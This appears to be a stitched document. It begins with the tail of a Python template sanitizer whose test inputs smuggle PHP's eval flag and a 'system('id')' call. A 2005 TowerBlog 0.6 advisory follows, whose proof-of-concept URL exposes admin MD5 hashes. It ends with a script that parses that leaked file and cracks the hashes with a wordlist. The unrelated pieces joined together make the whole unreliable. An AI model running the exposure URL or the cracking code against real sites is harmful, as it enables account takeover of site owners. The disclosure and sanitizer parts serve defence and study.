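
    With the 'e' flag, PHP's preg_replace() evaluates the replacement as code,
    so whoever controls the pattern string controls code execution."""
    pattern = pattern.strip()
    m = _PCRE.match(pattern)
    if not m:
        return None
    flags = m.group("flags")
    if "e" not in flags:
        return pattern
    d = m.group("d")
    return f"{d}{m.group('body')}{d}{flags.replace('e', '')}"


def check_if_expression(expr):
    """Return the set of function names in an {if ...} expression that are not allowed.

    An empty set means the expression only calls allow-listed functions."""
    names = set(_CALL.findall(expr)) - _KEYWORDS
    return {n for n in names if n not in ALLOWED_IF_FUNCS}


def is_safe_if_expression(expr):
    return not check_if_expression(expr)


if __name__ == "__main__":
    # Constructed inputs: one pattern smuggling the eval flag, one clean.
    print(sanitize_regex_pattern("/foo/ie"))     # -> /foo/i
    print(sanitize_regex_pattern("/foo/"))       # -> /foo/
    # Constructed expressions: one calls an arbitrary function, one does not.
    print(check_if_expression("count($x) > 0 and system('id')"))  # -> {'system'}
    print(check_if_expression("$foo and (count($x) == 1)"))       # -> set()
```

Stripping the flag rather than rejecting the whole pattern keeps legitimate templates working; rejecting outright is the stricter choice and equally defensible. The allow-list check is deliberately syntactic: it is applied before the expression is compiled, so a call that never reaches the compiler cannot be executed.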
From: CorryL (corryl at sitoverde.com)
Date: Sun Apr 10 2005 - 11:36:50 CDT
-=[--------------------ADVISORY-------------------]=-
-=[                                                 ]=-
-=[ TowerBlog <= 0.6                                ]=-
-=[                                                 ]=-
-=[ Author: CorryL x0n3-h4ck.org                    ]=-
-=[                                                 ]=-
-=[-----------------------------------------------------]=-
-=[+] Application: TowerBlog
-=[+] Version: 0.6
-=[+] Vendor's URL: http://tower.hybryd.org/?x=home
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: view admin account
-=[+] Exploitation: Remote/Local
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.x0n3-h4ck.org ~ irc.xoned.net #x0n3-h4ck
..::[ Description ]::..
TowerBlog is, in short, a single user web-log (or web journal if you will)
content management system, aka CMS.
While there are many others out there
(MovableType and GreyMatter as linked amongst the others)
none quite filled my own personal needs and desires.
Mind you, this isn't meant to be an insult to the other CMS' out there,
I myself used both MovableType and GreyMatter extensively for some time,
however no system I could find was as powerful as I needed, nor as easily
expanded.
The only one that came close, was PHPNuke, but it was too bulky and bloated
for my needs.
..::[ Bug ]::..
This application is affected by a bug that allows an attacker to obtain
very sensitive information, namely the user and admin password.
The cause is that the data for the admin account are saved in a text
file that is directly viewable in the browser.
..::[ Proof Of Concept ]::..
http://host/path of blog/_dat/login
189bbbb00c5f1fb7fba9ad9285f193d1 << UserName Admin
81dc9bdb52d04dc20036dbd8313ed055 << Password Admin
The result is the admin username and password as unsalted MD5 hashes:
the first line corresponds to the username, the second to the password.
..::[ Disclosure Timeline ]::..
[10/04/2005] - Vendor notification
[10/04/2005] - Vendor Response
[10/04/2005] - Public disclosure
CorryL
corryl80
gmail.com
www.x0n3-h4ck.org
Italian Security Team
Fax (+39) 02700520894
Tel (+39) 06452215277
irc.xoned.net #x0n3-h4ck
_________________________________
www.seekstat.it is your web stat
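The proof of concept above shows why a world-readable `_dat/login` is a full credential leak and not merely an information leak: the two values are plain, unsalted MD5 digests, so each wordlist candidate costs one hash computation. The following is an added example, not code from the advisory or from TowerBlog: it takes the file body as it would be returned by the URL in the proof of concept (constructed here from the two digests printed above, so it runs offline with no HTTP fetch), validates that it really is two hex MD5 lines rather than an error page, and tries a small wordlist against each. The wordlist is an assumption; the second digest is the MD5 of the string "1234", which the example recovers.

```python
"""Added example: parse the exposed TowerBlog _dat/login file and run a
wordlist against its unsalted MD5 digests. Wordlist is an assumption."""
import hashlib

# Constructed from the two digests shown in the proof of concept, one per line.
LOGIN_FILE = """189bbbb00c5f1fb7fba9ad9285f193d1
81dc9bdb52d04dc20036dbd8313ed055
"""

# Assumed toy wordlist; a real run would use a large one.
WORDLIST = ["admin", "root", "user", "test", "password", "1234", "12345", "123456"]

_HEX = set("0123456789abcdef")


def parse_login_file(body):
    """Return (user_hash, pass_hash) if the body is exactly two hex MD5 lines,
    else None (e.g. the server returned an HTML error page instead)."""
    lines = [line.strip().lower() for line in body.splitlines() if line.strip()]
    if len(lines) != 2:
        return None
    for line in lines:
        if len(line) != 32 or not set(line) <= _HEX:
            return None
    return lines[0], lines[1]


def crack_md5(digest, candidates):
    """Unsalted MD5: one hash per candidate, compare against the digest."""
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


def recover_credentials(body, candidates=WORDLIST):
    """Map the exposed file to whatever the wordlist recovers; None where it fails."""
    parsed = parse_login_file(body)
    if parsed is None:
        return None
    user_hash, pass_hash = parsed
    return {
        "username": crack_md5(user_hash, candidates),
        "password": crack_md5(pass_hash, candidates),
    }


if __name__ == "__main__":
    print(recover_credentials(LOGIN_FILE))  # password recovered as "1234"
```

On the constructed input the password digest falls to the toy wordlist immediately; the username digest does not match any of the eight candidates, which says nothing about its strength beyond that. The vendor's fix is not on this page; as an assumption, the usual remedies are to keep the data directory outside the web root, or to deny direct HTTP access to `_dat/`, and in either case to stop storing credentials as bare MD5.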